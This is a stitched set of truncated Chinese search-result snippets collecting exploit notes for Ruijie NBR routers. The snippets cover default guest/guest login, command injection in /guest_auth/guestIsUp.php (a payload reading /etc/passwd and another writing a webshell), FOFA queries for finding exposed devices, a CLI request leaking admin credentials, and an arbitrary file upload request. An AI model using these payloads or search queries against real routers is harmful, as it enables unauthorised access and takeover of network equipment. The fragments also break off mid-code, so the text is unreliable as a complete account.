锐捷网络股份有限公司是一家数据通信解决方案提供商。 锐捷网络股份有限公司NBR路由器存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。 漏洞影响 NBR路由器 漏洞复现 百度上查询到NBR路由器的默认账号密码为guest/guest 在NBR后台管理界面使用默认账号密码成功登录后台 poc import requestsfrom requests.packages.urllib3.e...
锐捷NBR路由器EWEB网关系统部分接口存在命令注入,导致远程命令执行获取 URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。 我们打开hacker Bar,在Post data 输入 mac=1&ip=192.168.1.1|cat /etc/passwd > test.txt 利用此漏洞我们可以将一句话木马写入shell Payload : mac=1&ip=192.168.1.1|echo ‘<?
锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限 漏洞影响 锐捷NBR路由器 EWEB网管系统 FOFA title="锐捷网络-EWEB网管系统" icon_hash="-692947551" 漏洞复现 出现漏洞的文件在/guest_auth/guestIsUp.php <?php //查询用户是否上线了 $userip = @$_POST['ip']; $usermac = @$_P...
漏洞影响 锐捷NBR路由器 FOFA title="锐捷网络 --NBR路由器--登录界面" 漏洞复现 登录页面如下 查看流量发现 CLI命令流量 请求包为 POST /WEB_VMS/LEVEL15/ HTTP/1.1 Host: Connection: keep-alive Content-Length: 73 Authorization: Basic User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb...
锐捷NBR路由器,越权CLI执行导致管理员账号泄露漏洞 (chaitin#1228) Browse filesBrowse the repository at this point in the history * Create poc1 * Delete poc1 * add poc * update * add poc * Delete ruijie-anyfile-read.yml * Update ruijie-nbr1300g-cli-password-leak.yml Co-authored-by: 123 ...
11 changes: 11 additions & 0 deletions11锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,11 @@ ##锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞 ``` POST /ddi/server/fileupload.php?uploadDir=../../321&name=12...